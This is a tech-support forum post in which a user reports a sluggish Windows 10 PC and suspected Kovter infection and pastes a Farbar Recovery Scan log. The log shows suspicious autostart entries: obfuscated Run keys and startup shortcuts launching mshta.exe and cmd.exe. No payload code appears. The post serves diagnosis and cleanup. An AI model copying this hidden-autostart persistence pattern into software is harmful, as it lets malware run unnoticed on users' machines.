Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

High CPU usage and possibly Kovter


  • Please log in to reply

#1
preacherswife

preacherswife

    Member

  • Member
  • PipPipPip
  • 193 posts

For a couple of months, I have noticed, my screen saver which is a message is supposed to bounce but it will freeze up.  My screen saver setting is set to kick in at 1 minute by the way.  Several times throughout the day, I will notice my screen saver is NOT bouncing but frozen.  After several seconds, it will move but freeze again.

 

I move the mouse to remove the screen saver but nothing happens.  I continually shake the mouse for at least 30 seconds and nothing.  I have had to resort to hitting control/alt/delete and the screen saver will disappear and I hit cancel and all things seem normal as far as the screen saver goes.

 

I have also noticed a lag when typing.  I can type rather quickly but the words do not appear as quickly as they should; perhaps, a half second or less in lag time.

 

G2G advised me to run the program Kovter removal tool.  I did as advised.  It ran just fine and disappeared when it finished.  It flashed something on the screen but it was off in an instant so I have no idea what it said.

 

G2G also asked me to check my CPU usage and I have two register server processes running and taking up a lot of CPU.

 

64 Bit OS

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 08-01-2017
Ran by Dorraine (administrator) on DORRAINE-PC (11-01-2017 01:56:56)
Running from C:\Users\Dorraine\Downloads
Loaded Profiles: Dorraine & DefaultAppPool (Available Profiles: Dorraine & DefaultAppPool)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Piriform Ltd) C:\Program Files\Defraggler\Defraggler64.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\w3wp.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_24_0_0_186.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_24_0_0_186.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-26] (Microsoft Corporation)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [25779624 2016-12-21] (Dropbox, Inc.)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2001920 2014-04-04] (AimerSoft)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-08-06] (SUPERAntiSpyware)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [Spotify Web Helper] => C:\Users\Dorraine\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1525360 2016-05-15] (Spotify Ltd)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\RunOnce: [Uninstall C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\ssText3d.scr [231936 2016-07-16] (Microsoft Corporation)
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2016-06-04]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-10]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-11]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{b9a91879-cca5-4abf-b5c9-de12170b6992}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl

FireFox:
========
FF ProfilePath: C:\Users\Dorraine\AppData\Roaming\Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 [2017-01-11]
FF Homepage: Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 -> hxxp://my.xfinity.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default [2016-09-27]
CHR Extension: (Google Slides) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-09-29]
CHR Extension: (Google Docs) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-09-29]
CHR Extension: (Google Drive) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-27]
CHR Extension: (YouTube) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-29]
CHR Extension: (Google Search) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-09-29]
CHR Extension: (Google Sheets) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-09-29]
CHR Extension: (Google Docs Offline) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-09-27]
CHR Extension: (Gmail) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-09-29]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [42096 2016-12-21] (Dropbox, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [7032080 2016-05-12] (TeamViewer GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.1.6.0\WsAppService.exe [388608 2016-01-28] (Wondershare) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 avgntflt; C:\Windows\SysWOW64\DRIVERS\avgntflt.sys [144664 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avipbb; C:\Windows\SysWOW64\DRIVERS\avipbb.sys [154392 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avkmgr; C:\Windows\SysWOW64\DRIVERS\avkmgr.sys [35488 2016-08-18] (Avira Operations GmbH & Co. KG)
R3 dot4; C:\WINDOWS\system32\DRIVERS\Dot4.sys [151968 2012-09-25] (Windows ® Win 7 DDK provider)
R3 Dot4Print; C:\WINDOWS\System32\drivers\Dot4Prt.sys [27040 2012-09-25] (Windows ® Win 7 DDK provider)
S3 k57nd; C:\WINDOWS\System32\DRIVERS\k57amd64.sys [356392 2011-10-25] (Broadcom Corporation)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S3 WsAudioDevice_383S(1); C:\WINDOWS\System32\drivers\WsAudioDevice_383S(1).sys [29288 2015-07-30] (Wondershare)
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-11 01:56 - 2017-01-11 01:58 - 00015534 _____ C:\Users\Dorraine\Downloads\FRST.txt
2017-01-11 01:55 - 2017-01-11 01:56 - 00001015 _____ C:\Users\Dorraine\Desktop\FRST64 - Shortcut.lnk
2017-01-11 01:52 - 2017-01-11 01:56 - 00000000 ____D C:\FRST
2017-01-11 01:51 - 2017-01-11 01:52 - 02419200 _____ (Farbar) C:\Users\Dorraine\Downloads\FRST64.exe
2017-01-10 23:49 - 2017-01-10 23:49 - 02744744 _____ (Symantec Corporation) C:\Users\Dorraine\Downloads\FixTool64(2).exe
2017-01-10 23:46 - 2017-01-10 23:50 - 02744744 _____ (Symantec Corporation) C:\Users\Dorraine\Downloads\FixTool64(1).exe
2017-01-10 23:45 - 2017-01-10 23:46 - 02744744 _____ (Symantec Corporation) C:\Users\Dorraine\Downloads\FixTool64.exe
2016-12-31 19:46 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Documents\MVI_3884_x264.mp4
2016-12-31 19:38 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Downloads\MVI_3884_x264.mp4
2016-12-31 19:33 - 2016-12-24 23:26 - 1440503384 _____ C:\Users\Dorraine\Documents\MVI_3884.MOV
2016-12-31 19:30 - 2016-12-31 18:33 - 12477637 _____ C:\Users\Dorraine\Documents\MVI_3886_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:26 - 18908883 _____ C:\Users\Dorraine\Documents\MVI_3883_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:19 - 14543355 _____ C:\Users\Dorraine\Documents\MVI_3885_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:57 - 23483944 _____ C:\Users\Dorraine\Documents\MVI_3888_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:47 - 15521466 _____ C:\Users\Dorraine\Documents\MVI_3887_x264.mp4
2016-12-31 17:35 - 2016-12-31 17:36 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming\Anvsoft
2016-12-31 17:35 - 2016-12-31 17:35 - 00001272 _____ C:\Users\Dorraine\Desktop\Any Video Converter.lnk
2016-12-31 17:35 - 2016-12-31 17:35 - 00000000 ____D C:\Users\Dorraine\Documents\Any Video Converter
2016-12-31 17:33 - 2016-12-31 17:33 - 00000000 ____D C:\Program Files (x86)\Anvsoft
2016-12-31 17:29 - 2016-12-31 17:30 - 51282968 _____ C:\Users\Dorraine\Downloads\avc-free.exe
2016-12-21 22:22 - 2016-12-21 22:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-12-21 13:15 - 2016-12-21 13:15 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2016-12-21 13:15 - 2016-12-21 13:15 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2016-12-21 13:15 - 2016-12-21 13:15 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2016-12-21 13:15 - 2016-12-21 13:15 - 00042096 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865
2016-12-13 23:21 - 2016-12-09 05:01 - 01503544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-12-13 23:21 - 2016-12-09 05:01 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-12-13 23:21 - 2016-12-09 04:57 - 06668040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-12-13 23:21 - 2016-12-09 04:52 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-12-13 23:21 - 2016-12-09 04:40 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2016-12-13 23:21 - 2016-12-09 04:34 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-12-13 23:21 - 2016-12-09 04:32 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2016-12-13 23:21 - 2016-12-09 04:30 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-12-13 23:21 - 2016-12-09 04:20 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-12-13 23:21 - 2016-12-09 04:18 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-12-13 23:21 - 2016-12-09 04:18 - 00165376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2016-12-13 23:21 - 2016-12-09 04:17 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-12-13 23:21 - 2016-12-09 04:16 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-12-13 23:21 - 2016-12-09 04:16 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-12-13 23:21 - 2016-11-02 05:28 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2016-12-13 23:20 - 2016-12-09 05:11 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-12-13 23:20 - 2016-12-09 05:01 - 02323728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2016-12-13 23:20 - 2016-12-09 04:59 - 02166752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-12-13 23:20 - 2016-12-09 04:59 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-12-13 23:20 - 2016-12-09 04:57 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-12-13 23:20 - 2016-12-09 04:56 - 00959112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-12-13 23:20 - 2016-12-09 04:52 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2016-12-13 23:20 - 2016-12-09 04:51 - 00117240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2016-12-13 23:20 - 2016-12-09 04:41 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WordBreakers.dll
2016-12-13 23:20 - 2016-12-09 04:34 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-12-13 23:20 - 2016-12-09 04:31 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-12-13 23:20 - 2016-12-09 04:31 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-12-13 23:20 - 2016-12-09 04:30 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-12-13 23:20 - 2016-12-09 04:28 - 03306496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-12-13 23:20 - 2016-12-09 04:27 - 19417088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-12-13 23:20 - 2016-12-09 04:23 - 12177920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-12-13 23:20 - 2016-12-09 04:20 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-12-13 23:20 - 2016-12-09 04:18 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-12-13 23:20 - 2016-12-09 04:16 - 00353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-12-13 23:20 - 2016-12-09 04:15 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-12-13 23:20 - 2016-12-09 04:15 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-12-13 23:20 - 2016-12-09 04:15 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditBufferTestHook.dll
2016-12-13 23:19 - 2016-12-09 05:00 - 00106896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcrypt.dll
2016-12-13 23:19 - 2016-12-09 04:36 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-12-13 23:19 - 2016-12-09 04:31 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-12-13 23:19 - 2016-12-09 04:17 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-12-13 23:19 - 2016-12-09 03:54 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-12-13 22:59 - 2016-12-09 05:20 - 01738560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-12-13 22:59 - 2016-12-09 05:19 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-12-13 22:59 - 2016-12-09 05:15 - 08168000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-12-13 22:59 - 2016-12-09 05:10 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-12-13 22:59 - 2016-12-09 04:45 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-12-13 22:59 - 2016-12-09 04:37 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-12-13 22:59 - 2016-12-09 04:22 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-12-13 22:59 - 2016-12-09 04:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-12-13 22:59 - 2016-12-09 04:21 - 01512960 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-12-13 22:59 - 2016-12-09 04:20 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-12-13 22:59 - 2016-12-09 04:19 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
